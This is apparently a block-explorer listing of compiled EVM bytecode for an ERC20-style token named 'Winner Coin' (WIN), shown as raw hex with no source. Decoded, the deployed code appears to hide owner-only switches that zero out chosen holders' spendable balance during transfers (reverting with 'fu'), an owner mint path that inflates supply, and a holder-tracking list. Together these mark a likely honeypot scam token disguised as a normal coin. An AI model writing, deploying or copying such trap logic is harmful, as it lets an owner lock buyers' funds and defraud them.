8261192e565b602082019050919050565b6000602082019050818103600083015261199381611957565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006119d48261155e565b91506119df8361155e565b92508282039050818111156119f7576119f661199a565b5b92915050565b6000611a088261155e565b9150611a138361155e565b9250828202611a218161155e565b91508282048414831517611a3857611a3761199a565b5b5092915050565b6000611a4a8261155e565b9150611a558361155e565b9250828201905080821115611a6d57611a6c61199a565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611acf602583611454565b9150611ada82611a73565b604082019050919050565b60006020820190508181036000830152611afe81611ac2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b61602483611454565b9150611b6c82611b05565b604082019050919050565b60006020820190508181036000830152611b9081611b54565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611bf3602283611454565b9150611bfe82611b97565b604082019050919050565b60006020820190508181036000830152611c2281611be6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611c5f601d83611454565b9150611c6a82611c29565b602082019050919050565b60006020820190508181036000830152611c8e81611c52565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cf1602583611454565b9150611cfc82611c95565b604082019050919050565b60006020820190508181036000830152611d2081611ce4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d83602383611454565b9150611d8e82611d27565b604082019050919050565b60006020820190508181036000830152611db281611d76565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e15602683611454565b9150611e2082611db9565b604082019050919050565b60006020820190508181036000830152611e4481611e08565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e81602083611454565b9150611e8c82611e4b565b602082019050919050565b60006020820190508181036000830152611eb081611e74565b905091905056fea2646970667358221220878c43ffd98b96ffd73f15b0592219fb9236eb56988f3e21b1c570513f55633164736f6c6343000812003300000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000b57696e6e657220436f696e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000357494e0000000000000000000000000000000000000000000000000000000000
Deployed ByteCode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c80636b254a9a116100a25780638da5cb5b116100715780638da5cb5b146102a657806395d89b41146102c4578063a457c2d7146102e2578063a9059cbb14610312578063dd62ed3e146103425761010b565b80636b254a9a1461023257806370a082311461024e578063715018a61461027e578063876b1566146102885761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806348f2f812146101e65780634a7eb02e146102025761010b565b806306fdde0314610110578063095ea7b31461012e5780630df884561461015e57806318160ddd1461017a575b600080fd5b610118610372565b60405161012591906114d9565b60405180910390f35b61014860048036038101906101439190611594565b610404565b60405161015591906115ef565b60405180910390f35b6101786004803603810190610173919061160a565b610422565b005b610182610650565b60405161018f9190611646565b60405180910390f35b6101b260048036038101906101ad9190611661565b61065a565b6040516101bf91906115ef565b60405180910390f35b6101d0610689565b6040516101dd91906116d0565b60405180910390f35b61020060048036038101906101fb9190611717565b610692565b005b61021c6004803603810190610217919061160a565b610784565b6040516102299190611766565b60405180910390f35b61024c60048036038101906102479190611717565b6107c3565b005b61026860048036038101906102639190611781565b6108ae565b6040516102759190611646565b60405180910390f35b6102866108f7565b005b61029061090b565b60405161029d919061186c565b60405180910390f35b6102ae610999565b6040516102bb9190611766565b60405180910390f35b6102cc6109c2565b6040516102d991906114d9565b60405180910390f35b6102fc60048036038101906102f79190611594565b610a54565b60405161030991906115ef565b60405180910390f35b61032c60048036038101906103279190611594565b610ad4565b60405161033991906115ef565b60405180910390f35b61035c6004803603810190610357919061188e565b610af2565b6040516103699190611646565b60405180910390f35b606060048054610381906118fd565b80601f01602080910402602001604051908101604052809291908181526020018280546103ad906118fd565b80156103fa5780601f106103cf576101008083540402835291602001916103fa565b820191906000526020600020905b8154815290600101906020018083116103dd57829003601f168201915b5050505050905090565b6000610418610411610b79565b8484610b81565b6001905092915050565b600061042c610b79565b90506000600154905061043d610b79565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105cc576000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411610557576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054e9061197a565b60405180910390fd5b80600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105a691906119c9565b9250508190555080600160008282546105bf91906119c9565b925050819055505061064b565b6000836002546105dc91906119fd565b905080600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461062d9190611a3f565b9250508190555080826106409190611a3f565b915081600181905550505b505050565b6000600154905090565b600080610665610b79565b9050610672858285610d4a565b61067d858585610ddf565b60019150509392505050565b60006006905090565b61069a610b79565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610729576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107209061197a565b60405180910390fd5b80600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6007818154811061079457600080fd5b906000526020600020016000915054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3373ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610853576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084a9061197a565b60405180910390fd5b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108ff61109e565b610909600061111c565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561098f57602002820191906000526020600020905b8160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019060010190808311610945575b5050505050905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546109d1906118fd565b80601f01602080910402602001604051908101604052809291908181526020018280546109fd906118fd565b8015610a4a5780601f10610a1f57610100808354040283529160200191610a4a565b820191906000526020600020905b815481529060010190602001808311610a2d57829003601f168201915b5050505050905090565b600080610a5f610b79565b90506000610a6d8286610af2565b905083811015610ab2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa990611ae5565b60405180910390fd5b610ac882868684610ac391906119c9565b610b81565b60019250505092915050565b6000610ae8610ae1610b79565b8484610ddf565b6001905092915050565b6000600b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bf0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be790611b77565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5690611c09565b60405180910390fd5b80600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d3d9190611646565b60405180910390a3505050565b6000610d568484610af2565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610dd95781811015610dc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db990611c75565b60405180910390fd5b610dd884848484610dd391906119c9565b610b81565b5b50505050565b6000610deb84846111e0565b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610e5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5390611d07565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ecb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec290611d99565b60405180910390fd5b81811015610f0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0590611e2b565b60405180910390fd5b81600860008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f5991906119c9565b600860008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610fe79190611a3f565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110879190611646565b60405180910390a361109883611339565b50505050565b6110a6610b79565b73ffffffffffffffffffffffffffffffffffffffff166110c4610999565b73ffffffffffffffffffffffffffffffffffffffff161461111a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161111190611e97565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600080600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156112cc5750600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156112d75780811890505b600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561132f5780811890505b8091505092915050565b600660008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611446576001600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506007819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600081519050919050565b600082825260208201905092915050565b60005b83811015611483578082015181840152602081019050611468565b60008484015250505050565b6000601f19601f8301169050919050565b60006114ab82611449565b6114b58185611454565b93506114c5818560208601611465565b6114ce8161148f565b840191505092915050565b600060208201905081810360008301526114f381846114a0565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061152b82611500565b9050919050565b61153b81611520565b811461154657600080fd5b50565b60008135905061155881611532565b92915050565b6000819050919050565b6115718161155e565b811461157c57600080fd5b50565b60008135905061158e81611568565b92915050565b600080604083850312156115ab576115aa6114fb565b5b60006115b985828601611549565b92505060206115ca8582860161157f565b9150509250929050565b60008115159050919050565b6115e9816115d4565b82525050565b600060208201905061160460008301846115e0565b92915050565b6000602082840312156116205761161f6114fb565b5b600061162e8482850161157f565b91505092915050565b6116408161155e565b82525050565b600060208201905061165b6000830184611637565b92915050565b60008060006060848603121561167a576116796114fb565b5b600061168886828701611549565b935050602061169986828701611549565b92505060406116aa8682870161157f565b9150509250925092565b600060ff82169050919050565b6116ca816116b4565b82525050565b60006020820190506116e560008301846116c1565b92915050565b6116f4816115d4565b81146116ff57600080fd5b50565b600081359050611711816116eb565b92915050565b6000806040838503121561172e5761172d6114fb565b5b600061173c85828601611549565b925050602061174d85828601611702565b9150509250929050565b61176081611520565b82525050565b600060208201905061177b6000830184611757565b92915050565b600060208284031215611797576117966114fb565b5b60006117a584828501611549565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b6117e381611520565b82525050565b60006117f583836117da565b60208301905092915050565b6000602082019050919050565b6000611819826117ae565b61182381856117b9565b935061182e836117ca565b8060005b8381101561185f57815161184688826117e9565b975061185183611801565b925050600181019050611832565b5085935050505092915050565b60006020820190508181036000830152611886818461180e565b905092915050565b600080604083850312156118a5576118a46114fb565b5b60006118b385828601611549565b92505060206118c485828601611549565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061191557607f821691505b602082108103611928576119276118ce565b5b50919050565b7f6675000000000000000000000000000000000000000000000000000000000000600082015250565b6000611964600283611454565b915061196f8261192e565b602082019050919050565b6000602082019050818103600083015261199381611957565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006119d48261155e565b91506119df8361155e565b92508282039050818111156119f7576119f661199a565b5b92915050565b6000611a088261155e565b9150611a138361155e565b9250828202611a218161155e565b91508282048414831517611a3857611a3761199a565b5b5092915050565b6000611a4a8261155e565b9150611a558361155e565b9250828201905080821115611a6d57611a6c61199a565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611acf602583611454565b9150611ada82611a73565b604082019050919050565b60006020820190508181036000830152611afe81611ac2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b61602483611454565b9150611b6c82611b05565b604082019050919050565b60006020820190508181036000830152611b9081611b54565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611bf3602283611454565b9150611bfe82611b97565b604082019050919050565b60006020820190508181036000830152611c2281611be6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611c5f601d83611454565b9150611c6a82611c29565b602082019050919050565b60006020820190508181036000830152611c8e81611c52565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cf1602583611454565b9150611cfc82611c95565b604082019050919050565b60006020820190508181036000830152611d2081611ce4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d83602383611454565b9150611d8e82611d27565b604082019050919050565b60006020820190508181036000830152611db281611d76565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e15602683611454565b9150611e2082611db9565b604082019050919050565b60006020820190508181036000830152611e4481611e08565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611e81602083611454565b9150611e8c82611e4b565b602082019050919050565b60006020820190508181036000830152611eb081611e74565b905091905056fea2646970667358221220878c43ffd98b96ffd73f15b0592219fb9236eb56988f3e21b1c570513f55633164736f6c63430008120033